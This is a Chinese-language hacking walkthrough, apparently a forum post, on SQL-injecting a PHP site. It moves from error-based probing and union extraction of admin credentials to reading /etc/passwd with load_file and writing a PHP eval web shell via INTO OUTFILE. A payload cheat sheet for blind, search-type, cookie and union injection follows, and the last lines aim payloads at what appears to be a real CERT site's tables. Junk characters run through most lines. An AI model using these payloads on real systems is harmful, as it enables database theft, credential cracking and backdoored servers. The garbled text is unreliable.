我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~$ A- g( F: a' X
/ {+ g2 N1 w3 _ L6 m+ e我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。9 l/ p# K( |' [6 p7 x9 H& q" y
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)$ n( X& K8 n O, `8 [; b+ }
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,) ^0 K' B4 ~: v( l+ j$ V$ A# s4 i
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
0 _' m8 x& v: B# KWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in- I) U& R9 T# t7 o
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入1 A8 `; U7 o7 Y( s- I
]3 }% r/ J! H8 r+ j2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
- m9 `9 o. p w3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
% X" T& Q. u% z' x% `4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息( f' z1 N+ @' O: g9 K6 R) D- k
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。7 z8 N5 O5 \. g0 Y% t1 n' N; H0 O
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,- W/ E7 j" O) D. w) G
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。: q! n ?7 F) t+ n) n
& ~, a* |/ q, T0 s; v. ^$ J6 n7 g提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- " m8 ^. ?- l6 n/ x# y- [
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
l. y2 t8 A3 a6 W提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
# h; B7 x& D8 ?1 J注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。" I; _- M/ T0 B1 ]) g }
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????/ I- Z# V; B, _, H& y
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
6 n, r& |4 n( y) M提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
4 Z1 {- k2 @# i5 p+ Q& X& x& `然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,: V2 p2 F9 L7 L/ `
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
& }* s r) x' s7 W下面是一些很普遍注入方式资料:" Z0 H( P8 O' @4 ?
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
: U4 ?4 |7 Z" N: S6 C拆半法, Y$ j4 `( _6 m3 D# }* T6 J) Y
######################################1 O. T F2 H. u- y* F
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。3 r. o4 K; W6 [8 Y! ]
and exists (select * from admin)
& }, |3 [/ u' m: tand exists(select id from admin)) p5 C) G x; O8 i" G
and exists(select id from admin where id=1)
1 Z" {" h4 x( ?: `1 Pand exists(select id from admin where id>1)
2 B, N" I1 P3 u8 E) G9 k$ P1 {然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 . {: l6 Q" o3 _) J# {" f
and exists (select username from admin)
$ q' ?! u1 N: e+ K. sand exists (select password from admin)6 l6 G, i7 N4 K' M9 J
and exists (select id from admin where len(username)<10 and id=1)+ a5 Z7 P: ]7 Q/ y. r/ M) \
and exists (select id from admin where len(username)>5 and id=1)* j* P, C5 {( b& x/ @% i6 _8 k
and exists (select id from admin where len(username)=6 and id=1)
! m, f# {0 l. |' W- u0 M/ nand exists (select id from admin where len(password)<10 and id=1)% ]" n5 H m, ?
and exists (select id from admin where len(password)>5 and id=1)
! F7 y, w3 y1 l _% nand exists (select id from admin where len(password)=7 and id=1)
8 i& @5 d5 i+ Y% `and (select top 1 asc(mid(username,1,1)) from admin)=97
; F3 r" k6 ~1 z- B+ w& c返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。# k% J6 C6 E! b* S( |3 X0 B
猜第二位把username,1,1改成username,2,1就可以了。 [) I! `7 E* [) b3 c0 M
% ^# j4 R0 g. p1 ^' ?# o##################################################% v$ R: m& ]7 k- }# [. U
0 D8 E; Y6 o( ?+ G##################################) @0 E2 D+ u7 }& t
%' and 1=1 and '%'='" [2 K+ h1 M0 F9 S0 k# R4 M
%' and exists (select * from admin) and '%'='- r" B9 Q/ G+ E* i- I j1 b; x& Z
%' and exists(select id from admin where id=1) and '%'='
& |6 @/ s0 w+ |( k1 C1 k. o/ w7 }%' and exists (select id from admin where len(username)<10 and id=1) and '%'='! z, s/ G3 ~* V# \6 y' z: t$ P
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
2 ^, R+ O' C3 ]5 j6 M9 h" H%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='7 D. q4 k5 F p. J& [
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
* C+ w7 _0 O0 f8 a对于MSSQL数据库,后面可以吧 and '%'='换成--& {8 \% |8 v! t* z: h6 L
还有一点搜索型注入也可以使用union语句。: z5 r+ [2 N/ \3 @! {6 u3 [
1 x6 a9 y B, E" p联合查询。
1 g R3 n9 D- R1 |* k' Y. n$ @#####################################. b' M* e ^ J
order by 10- b) w+ j* }5 m2 T) {' \
and 1=2 union select 1,2,3,4,5,6,7,8,9,10/ o* L2 J7 k" |: N' h
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
* {1 o2 b$ D: V' H9 ]. hand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=15 Z1 E6 Q6 e9 V8 G4 x
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
; N' p; ^) C& H; l9 |. y. x, e! Q###################################
' e/ ^7 T. f# y9 J) ]. ~cookie注入
2 g: g4 x7 P- M" L' a8 n1 N###############################' s8 ~+ r* H+ Y. [1 m
X* t1 b" t6 q& i9 f$ p& u _: xhttp://www.******.com/shownews.asp6 d! v; ]1 B" _: i% x+ _; z9 M2 R
' _( \5 \5 y7 g* z" }3 V/ B' {9 Dalert(="id="+escape("127 and 1=1"));
+ `+ C( i8 z0 {% T7 U. talert(="id="+escape("127 order by 10"));
) Y1 y/ r7 W+ q: l8 ^3 O: balert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
4 [' K: y1 u5 h2 [3 Jalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));/ C/ P, G' g8 ], R% ]
' W7 N) e. f# V###################################& Y, }) B' D6 n; |/ d7 H. ?
& k6 P1 a" T" J###########################################################
@4 ?" d' e: k% J+ {union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
: y6 K- Z" a. nunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin6 g; G/ e/ p) S& n
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)2 c/ ^+ K2 g) k: @% ~) O/ u
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
$ Y# @1 U" k5 m: f; H" _$ uunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)$ M' E* M- w& I; E6 h
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
4 }3 r) f0 u' I3 K. Cunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
2 N3 I% }4 p* o1 F- J4 ba.id=d.id)0 F9 o8 m" I( V1 K# G/ ]. {
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)4 ?! U* y: ~( D( ?9 D
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) $ ], T8 a( ^6 O* y# t9 I4 N
( {7 U* X. h( \/ M9 l
============================================================================================================+ `. d! z1 X9 b9 l! o5 S
" z6 T( M2 Q6 m$ o) f2 B; o% Kand ord(mid(version(),1,1))>510 c8 l* G, l# O& b# w
返回正常,说明大于4.0版本,支持ounion查询; m. @9 r0 N$ s- ?8 r4 ]# X
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解4 J( Q! H5 S3 a* |8 g, B
and 2=4 union select 1,2,3,4,5,6,7,8,9--
( u8 }+ v2 B2 C) h/ D3.查看数据库版本及当前用户,
& B" g$ {: j) }0 aand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
) t- U6 N: m3 Z, I2 n; E数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
. R1 g" }* z9 d& S4.判断有没有写权限
) D1 K6 J( S* Land (select count(*) from MySQL.user)>0-- 0 K- q9 \. X) d* k7 H
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,12 p" J# P c M0 l0 q0 |8 _$ a
) _" ^+ ?; a/ d; R" j! x# P) @and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
7 Q, P1 Z* e; Q m) H6.爆表,爆库! ~3 t7 a: v- K1 o7 Q6 ^+ p
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--- Y2 f4 z/ `- X3 _. g! K: Z
! D6 z, d# F& |! s: c7 O+ _and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
- \9 Z! x7 ^5 H0 w8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
$ E" z# y( a9 H4 ]and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
% y. l1 |3 i6 H5 n4 c9.爆字段内容
3 O& X/ h- H) }7 l O7 ]and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
4 h0 |* Y' o5 c8 r# D2 B# [http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |